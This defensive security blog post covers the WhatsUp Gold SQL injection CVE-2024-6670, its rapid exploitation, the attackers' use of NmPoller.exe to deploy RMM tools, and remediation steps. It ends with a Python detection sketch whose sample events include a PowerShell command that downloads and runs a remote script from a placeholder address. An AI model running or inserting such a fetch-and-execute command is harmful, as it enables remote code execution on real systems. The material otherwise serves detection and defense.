Five hours from public PoC to live exploitation on your monitoring server
CVE-2024-6670 is an unauthenticated SQL injection in WhatsUp Gold. The exploit went public at 5pm UTC; Trend Micro saw the first real attack by 10pm. The tool that watches your whole network became the way in.
Here’s the timeline that should change how you schedule patches for infrastructure software. On August 30, 2024, at 5pm UTC, the researcher who found CVE-2024-6670 published a proof-of-concept exploit on GitHub. By 10pm UTC the same day, Trend Micro’s managed-detection team observed the first real-world attack abusing it. Five hours from public exploit code to live exploitation in a customer environment. The patch had been available for two weeks. It didn’t matter, because two weeks is slower than five hours.
The target was WhatsUp Gold, Progress Software’s network monitoring platform. That product choice is not incidental. Monitoring servers are built to reach everything, hold credentials to half your infrastructure, and run trusted background processes. When the thing that watches the network is the thing that gets popped, the attacker inherits the vantage point you built for your own operations team.
What the bug is
CVE-2024-6670 is an unauthenticated SQL injection (CWE-89), CVSS 9.8. Progress patched it in the August 2024 bulletin, with the fix landing in WhatsUp Gold 2024.0.0. The specific impact, as worded in the CISA KEV entry, is narrow on paper and brutal in practice: when the application is configured with only a single user, which is an extremely common deployment, an unauthenticated attacker can use the injection to retrieve that user’s encrypted password. Recover the plaintext from that and you don’t need an RCE bug; you just log in to the monitoring console that already has reach across the estate. CVE-2024-6671 is the sibling SQLi from the same bulletin. The discoverer, Sina Kheirkhah of Summoning Team, published the analysis and PoC together.
What the attackers did next is the part worth studying. Rather than carry their own malware in, they abused NmPoller.exe, a legitimate WhatsUp Gold component, as a script host: the poller was used to execute PowerShell that downloaded a spread of remote-access tools, including Atera Agent, Radmin, SimpleHelp, and Splashtop. That’s living-off-the-land using the monitoring product’s own trusted binary, then establishing persistence through commodity RMM software that blends into a managed environment. CISA flagged the entry for known ransomware-campaign use, and the remediation deadline was October 7, 2024.
This wasn’t WhatsUp Gold’s only 2024 critical
CVE-2024-6670 didn’t arrive in a vacuum. Two months earlier, Progress patched CVE-2024-4885, an unauthenticated remote code execution flaw, also CVSS 9.8, in the WhatsUp.ExportUtilities.Export.GetFileWithoutZip handler. A path traversal (CWE-22) there allowed command execution with iisapppool\nmconsole privileges, fixed in version 2023.1.3. At disclosure there was no public evidence of exploitation, but CISA added it to the KEV catalog on March 3, 2025, which means exploitation evidence eventually arrived. So within a few months of 2024, the same monitoring product shipped a string of unauthenticated 9.8 bugs, each reachable by anyone who could see the web interface, and two of them, CVE-2024-4885 and CVE-2024-6670, ended up on the exploited-in-the-wild list.
That’s the pattern that should drive the prioritization, not any single CVE. A product with a string of pre-authentication criticals in management-plane functionality is telling you something about its exposure, and the operational answer is the same regardless of which specific bug is in the news: this thing should not be reachable from anywhere it doesn’t have to be.
What to do
- Get current and stay current. WhatsUp Gold needs to be on 2024.0.0 or later to close CVE-2024-6670 and CVE-2024-6671, and on at least 2023.1.3 to close CVE-2024-4885; the latest release rolls all of these up. Given the cadence of criticals in this product, treat its patches as out-of-band-eligible, not quarterly-window material.
- Take it off the public internet. There is no good reason for a network monitoring console to answer to the open web. Put the management interface behind VPN or IP allowlisting. The five-hour exploitation window only burns you if the attacker can reach the interface; restrict that reach and the PoC-to-exploit race stops being your problem.
- Hunt for NmPoller.exe doing things a poller shouldn’t. A monitoring poller spawning PowerShell, or initiating outbound downloads, is anomalous. Alert on NmPoller.exe as a parent process for powershell.exe, cmd.exe, or script interpreters. That single detection would have caught this campaign’s post-exploitation step.
- Inventory the RMM tools in your environment. Atera, Radmin, SimpleHelp, and Splashtop are all legitimate products, which is exactly why attackers reach for them. If one appears on a server that your team didn’t deploy, that’s a finding, not a footnote. Maintain an allowlist of sanctioned remote-access tools so the unsanctioned ones stand out.
- Rotate the monitoring credentials if you were exposed before patching. The whole point of the SQLi was credential theft. If you ran an unpatched, internet-reachable instance, assume the admin credential leaked and rotate it, along with any infrastructure credentials that account could reach.
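The two hunting items above, the NmPoller.exe parent-process check and the RMM allowlist, reduce to a few lines of logic over process-creation telemetry. The sketch below is an added example, not code from the original post or from Progress or Trend Micro. It takes Sysmon Event ID 1 records reduced to the fields the checks need (Image, ParentImage, CommandLine, Computer); the sample events are constructed, the WhatsUp Gold and RMM install paths in them are assumptions rather than observed indicators, and matching RMM products on a substring of the install path is a heuristic you would tune to the binaries your team actually sees.

```python
"""Detection sketch for the WhatsUp Gold post-exploitation pattern:
NmPoller.exe spawning a script host, and RMM agents nobody sanctioned.

Input: Sysmon Event ID 1 (process creation) records reduced to dicts with
Computer, ParentImage, Image, CommandLine. Sample events are constructed."""

import ntpath
from typing import Iterable, Optional

# Script hosts a monitoring poller has no business launching directly.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "mshta.exe",
}

# The RMM products named in the Trend Micro write-up. Substring match on the
# image path is a heuristic: binary names vary by product version.
RMM_KEYWORDS = ("atera", "radmin", "simplehelp", "splashtop")


def basename(path: str) -> str:
    """Lower-case file name of a Windows path (ntpath splits on backslashes on any OS)."""
    return ntpath.basename(path).lower()


def poller_spawned_script_host(event: dict) -> bool:
    """True when NmPoller.exe is the parent and the child is a script interpreter."""
    return (basename(event.get("ParentImage", "")) == "nmpoller.exe"
            and basename(event.get("Image", "")) in SCRIPT_HOSTS)


def unsanctioned_rmm(event: dict, sanctioned: set) -> Optional[str]:
    """Return the RMM keyword found in the image path if that product is not sanctioned."""
    image = event.get("Image", "").lower()
    for kw in RMM_KEYWORDS:
        if kw in image and kw not in sanctioned:
            return kw
    return None


def scan(events: Iterable[dict], sanctioned: set) -> list:
    """Run both checks over process-creation events and return findings in order."""
    findings = []
    for ev in events:
        if poller_spawned_script_host(ev):
            findings.append({"rule": "nmpoller_script_host", "host": ev["Computer"],
                             "detail": ev.get("CommandLine", "")})
        kw = unsanctioned_rmm(ev, sanctioned)
        if kw:
            findings.append({"rule": "unsanctioned_rmm", "host": ev["Computer"],
                             "detail": kw})
    return findings


# Constructed sample events, not real telemetry. Paths are assumed defaults;
# 198.51.100.7 is a TEST-NET-2 address.
WUG_DIR = r"C:\Program Files (x86)\Ipswitch\WhatsUp"
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    {   # normal service start of the poller: not a finding
        "Computer": "wug01", "ParentImage": r"C:\Windows\System32\services.exe",
        "Image": WUG_DIR + r"\NmPoller.exe", "CommandLine": "NmPoller.exe"},
    {   # the campaign's pattern: poller launching PowerShell to fetch a payload
        "Computer": "wug01", "ParentImage": WUG_DIR + r"\NmPoller.exe",
        "Image": PS_EXE,
        "CommandLine": 'powershell.exe -ep bypass -c "iwr http://198.51.100.7/a.ps1 | iex"'},
    {   # an admin at the console: PowerShell with an ordinary parent, not a finding
        "Computer": "wug01", "ParentImage": r"C:\Windows\explorer.exe",
        "Image": PS_EXE, "CommandLine": "powershell.exe"},
    {   # an RMM agent appearing on the monitoring server (assumed install path)
        "Computer": "wug01", "ParentImage": r"C:\Windows\System32\msiexec.exe",
        "Image": r"C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe",
        "CommandLine": "AteraAgent.exe"},
    {   # the RMM your team actually deployed: sanctioned, not a finding
        "Computer": "wug01", "ParentImage": r"C:\Windows\System32\services.exe",
        "Image": r"C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRService.exe",
        "CommandLine": "SRService.exe"},
]

SANCTIONED_RMM = {"splashtop"}  # whatever your own allowlist says


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS, SANCTIONED_RMM):
        print(f"[{f['rule']}] {f['host']}: {f['detail']}")
```

Run against the constructed events this yields exactly two findings: the poller-to-PowerShell launch and the Atera agent, while the ordinary poller start, the admin's PowerShell session and the sanctioned Splashtop service stay quiet. In production you would feed it from your SIEM's process-creation events and key the allowlist per host or host group rather than globally.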
The reframe is about clocks. Patch-management programs are still largely built around the idea that you have a window, a few weeks between a fix shipping and exploitation becoming widespread, to test and deploy on your own schedule. For internet-reachable infrastructure software with a public PoC, that window has collapsed to hours. CVE-2024-6670 is the proof: the defenders who patched in those first two weeks were fine, and everyone planning to get to it “next maintenance cycle” was racing a clock that had already run out. We flag this class of bug, pre-auth criticals in infrastructure you expose, the day it lands, because for these the gap between the advisory and the attack is now measured in hours.
Sources
- CISA Known Exploited Vulnerabilities Catalog
- NVD CVE-2024-6670 — 2024-08-29
- NVD CVE-2024-4885 — 2024-06-25
- Progress WhatsUp Gold Security Bulletin, August 2024 — 2024-08-16
- Trend Micro: Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities — 2024-09
- SecurityWeek: Recent WhatsUp Gold vulnerabilities possibly exploited in ransomware attacks — 2024-09